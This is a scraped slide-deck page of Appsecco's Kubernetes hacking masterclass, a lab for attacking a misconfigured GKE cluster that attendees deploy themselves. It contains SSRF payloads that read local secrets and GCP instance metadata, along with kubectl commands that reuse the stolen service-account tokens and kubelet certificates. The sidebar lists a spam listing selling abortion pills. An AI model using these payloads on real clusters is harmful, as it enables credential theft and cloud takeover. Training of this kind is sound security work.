Top 10 Tips To Get Google AdSense For Your Website
Top 10 Tips To Get Google AdSense For Your WebsiteTop 10 Tips To Get Google AdSense For Your Website
Top 10 Tips To Get Google AdSense For Your Website
e-Definers Technology
 

Recently uploaded (20)

COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...
COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...
COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...
 
Wired_2.0_Create_AmsterdamJUG_09072024.pptx
Wired_2.0_Create_AmsterdamJUG_09072024.pptxWired_2.0_Create_AmsterdamJUG_09072024.pptx
Wired_2.0_Create_AmsterdamJUG_09072024.pptx
 
What is OCR Technology and How to Extract Text from Any Image for Free
What is OCR Technology and How to Extract Text from Any Image for FreeWhat is OCR Technology and How to Extract Text from Any Image for Free
What is OCR Technology and How to Extract Text from Any Image for Free
 
AWS Cloud Practitioner Essentials (Second Edition) (Arabic) Course Introducti...
AWS Cloud Practitioner Essentials (Second Edition) (Arabic) Course Introducti...AWS Cloud Practitioner Essentials (Second Edition) (Arabic) Course Introducti...
AWS Cloud Practitioner Essentials (Second Edition) (Arabic) Course Introducti...
 
React vs Next js: Which is Better for Web Development? - Semiosis Software Pr...
React vs Next js: Which is Better for Web Development? - Semiosis Software Pr...React vs Next js: Which is Better for Web Development? - Semiosis Software Pr...
React vs Next js: Which is Better for Web Development? - Semiosis Software Pr...
 
React Native vs Flutter - SSTech System
React Native vs Flutter - SSTech SystemReact Native vs Flutter - SSTech System
React Native vs Flutter - SSTech System
 
WhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdf
WhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdfWhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdf
WhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdf
 
dachnug51 - HCL Sametime 12 as a Software Appliance.pdf
dachnug51 - HCL Sametime 12 as a Software Appliance.pdfdachnug51 - HCL Sametime 12 as a Software Appliance.pdf
dachnug51 - HCL Sametime 12 as a Software Appliance.pdf
 
ENISA Threat Landscape 2023 documentation
ENISA Threat Landscape 2023 documentationENISA Threat Landscape 2023 documentation
ENISA Threat Landscape 2023 documentation
 
Folding Cheat Sheet #7 - seventh in a series
Folding Cheat Sheet #7 - seventh in a seriesFolding Cheat Sheet #7 - seventh in a series
Folding Cheat Sheet #7 - seventh in a series
 
Abortion pills in Fujairah *((+971588192166*)☎️)¥) **Effective Abortion Pills...
Abortion pills in Fujairah *((+971588192166*)☎️)¥) **Effective Abortion Pills...Abortion pills in Fujairah *((+971588192166*)☎️)¥) **Effective Abortion Pills...
Abortion pills in Fujairah *((+971588192166*)☎️)¥) **Effective Abortion Pills...
 
Overview of ERP - Mechlin Technologies.pptx
Overview of ERP - Mechlin Technologies.pptxOverview of ERP - Mechlin Technologies.pptx
Overview of ERP - Mechlin Technologies.pptx
 
Leading Project Management Tool Taskruop.pptx
Leading Project Management Tool Taskruop.pptxLeading Project Management Tool Taskruop.pptx
Leading Project Management Tool Taskruop.pptx
 
WEBINAR SLIDES: CCX for Cloud Service Providers
WEBINAR SLIDES: CCX for Cloud Service ProvidersWEBINAR SLIDES: CCX for Cloud Service Providers
WEBINAR SLIDES: CCX for Cloud Service Providers
 
Cultural Shifts: Embracing DevOps for Organizational Transformation
Cultural Shifts: Embracing DevOps for Organizational TransformationCultural Shifts: Embracing DevOps for Organizational Transformation
Cultural Shifts: Embracing DevOps for Organizational Transformation
 
Shivam Pandit working on Php Web Developer.
Shivam Pandit working on Php Web Developer.Shivam Pandit working on Php Web Developer.
Shivam Pandit working on Php Web Developer.
 
MVP Mobile Application - Codearrest.pptx
MVP Mobile Application - Codearrest.pptxMVP Mobile Application - Codearrest.pptx
MVP Mobile Application - Codearrest.pptx
 
Migrate your Infrastructure to the AWS Cloud
Migrate your Infrastructure to the AWS CloudMigrate your Infrastructure to the AWS Cloud
Migrate your Infrastructure to the AWS Cloud
 
active-directory-auditing-solution (2).pptx
active-directory-auditing-solution (2).pptxactive-directory-auditing-solution (2).pptx
active-directory-auditing-solution (2).pptx
 
Top 10 Tips To Get Google AdSense For Your Website
Top 10 Tips To Get Google AdSense For Your WebsiteTop 10 Tips To Get Google AdSense For Your Website
Top 10 Tips To Get Google AdSense For Your Website
 

Appsecco Kubernetes Hacking Masterclass Presentation Slides

  • 1. Appsecco Case Studies 2022 mid-year Some of our work so far in 2022 15th Dec 2023
  • 2. What will we do today? 1. Deploy a GKE cluster in our own accounts and setup some misconfigurations to exploit 2. Talk about some relevant Kubernetes controls for today's masterclass 3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster 4. Q&A o use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
  • 4. Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET! https://appsecco-masterclass.s3.amazonaws.com/commands.txt Login to Google Cloud Console and in the same browser open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell. https://console.cloud.google.com/ https://shell.cloud.google.com/?show=terminal
  • 5. Make sure you run the commands from the Google CloudShell 1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing. 2. Note the IP address printed at the end of the command
  • 7. Kubernetes, and depending on the cloud platform it is run on top of, has multiple security features and controls built into the environment. • As hackers we rely on these to be misconfigured or absent :) We will look at 2 main security/concepts in Kubernetes, relevant to our class today 1. Pod Security Admission 2. Role Based Access Control
  • 8. 1. Let's create 2 namespaces each with a different Pod Security Standard 2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces o kubectl apply -f restricted-namespace.yaml o kubectl apply -f privileged-namespace.yaml 3. Now attempt to start a privileged pod within each of the namespaces o kubectl get ns o kubectl apply -f nginx-privileged.yaml -n privileged-namespace o kubectl apply -f nginx-privileged.yaml -n restricted-namespace 4. What do you see?
  • 9. Pod Admission Controller – In simple terms • This is code that intercepts requests reaching the API server to verify if the object (pod, namespace etc.) create request passes a list of allowed checks or not. o The list of checks the request is compared against are called the Pod Security Standards o There are 3 standards - privileged, baseline, and restricted
  • 10. Let's enumerate what roles and clusterroles are present in this cluster and how they are bound 1. Enumerate roles within the kube-system namespace o kubectl get roles -n kube-system o kubectl get rolebindings -n kube-system 2. For each of the rolebindings enumerate the subject attached o kubectl get rolebindings <BINDING_NAME> -n kube-system 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud- provider --list
  • 11. Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC 1. Enumerate clusterroles across the cluster o kubectl get clusterroles o kubectl get clusterrolebindings 2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached o kubectl get clusterrolebindings <BINDING_NAME> 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:apps:default --list
  • 12. Role and ClusterRole and Bindings • An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions are purely additive (there are no "deny" rules). • A Role always sets permissions within a particular namespace;when you create a Role,you have to specifythe namespace it belongs in. • ClusterRole,is a non-namespaced resourceand applies to the entire cluster. • Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions • If you want to define a role within a namespace,use a Role;if you want to define a role cluster- wide, use a ClusterRole.
  • 15. • All pods will have access to the default service account mounted as a file system object within the pod at o /var/run/secrets/kubernetes.io/serviceaccount/token o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt • We can extract them and use them to interact with the cluster o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes So how do we gain access to this service account or files from the pod?
  • 16. • Let's take a closer look at the app that was deployed • Login to the application using username serveradmin and password monitorworld • What is the app's functionality? • What vulnerability is present here?
  • 17. • The application takes a URL from the user and makes a server side request on the user's behalf o Such a feature, if not protected properly is often vulnerable to Server Side Request Forgeries (SSRF/XSPA) • Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files! • Try these as input o file:///etc/passwd o file:///etc/shadow
  • 18. • Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell. file:///var/run/secrets/kubernetes.io/serviceaccount/token file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt • Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes • Use auth plugin to view your current access with the stolen credentials kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt - -list
  • 21. We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions 1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE information etc. • file:///proc/self/environ 2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials • http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env 3. Fetch the Google VM instance's compute service account's token and scope to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment. • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token • http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes • http://169.254.169.254/computeMetadata/v1/project/project-id
  • 23. kube-env from Instance Metadata cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk '{print $2}' | base64 -d > kubelet.crt cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk '{print $2}' | base64 -d > kubelet.key cat kube-env | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt kubectl auth --client-certificate=kubelet.crt - -client-key=kubelet.key --certificate- authority=apiserver.crt --server=$KUBERNE TES_API_SERVER can-i --list https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5
  • 24. Google Cloud Compute SA Token Stealing
  • 25. Tear Down the Cluster (to avoid credit wastage) (optional, don't if you want to practice)
  • 26. 1. https://kubernetes.io/docs/concepts/security/pod-security-admission/ 2. https://kubernetes.io/docs/concepts/security/pod-security-standards/ 3. https://kubernetes.io/docs/reference/access-authn-authz/rbac/ 4. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-1-2b328252954a 5. https://blog.appsecco.com/a-pentesters-approach-to-kubernetes-security-part-2-8efac412fbc5 6. https://blog.appsecco.com/hacking-an-aws-hosted-kubernetes-backed-product-and-failing-904cbe0b7c0d 7. https://kloudle.com/blog/part-1-mapping-the-mitre-att-ck-framework-to-your-kubernetes-cluster-initial-access/ 8. https://kloudle.com/academy/simple-steps-to-set-up-a-2-node-kubernetes-cluster-using-kubeadm/ 9. https://kloudle.com/academy/auditing-kubernetes-with-kubeaudit-conducting-an-assessment/ 10. https://kloudle.com/blog/rogue-one-a-certified-kubernetes-administrator-cka-exam-story/ 11. https://kloudle.com/blog/refuting-aws-chain-attack-digging-deeper-into-eks-zero-days-claim/ 12. https://kloudle.com/academy/5-important-security-settings-you-need-to-review-for-your-gke-clusters/ 13. https://kloudle.com/blog/developerweek-europe-2021-walkthrough-of-the-talk-slides-and-audience-questions/ 14. https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata 15. Hacking Kubernetes Clusters - https://www.youtube.com/watch?v=xDj4_ZI1Y9A 16. Kubernetes 101 - https://www.youtube.com/watch?v=Z5nj6IpNJIM 17. Kubernetes Crash Course for Absolute Beginners - https://youtu.be/s_o8dwzRlu4?t=104
  • 27. Q&A
  • 28. • Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration Testing as a Service at Appsecco • Appsecco is a boutique security consulting company with customers across the world. • Over a decade and half experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers • Love to teach! Speak and train at a bunch of conferences! https://www.linkedin.com/in/riyazw/ riyaz@appsecco.com | +91 9886042242 https://appsecco.com | https://blog.appsecco.com
  • 29. About Appsecco Pragmatic, holistic, business-focused approach Specialist Cloud and Application Security company Highly experienced and diverse team Assigned multiple CVEs Certified hackers OWASP chapter leads Cloud and Kubernetes security experts Black Hat & Def Con speakers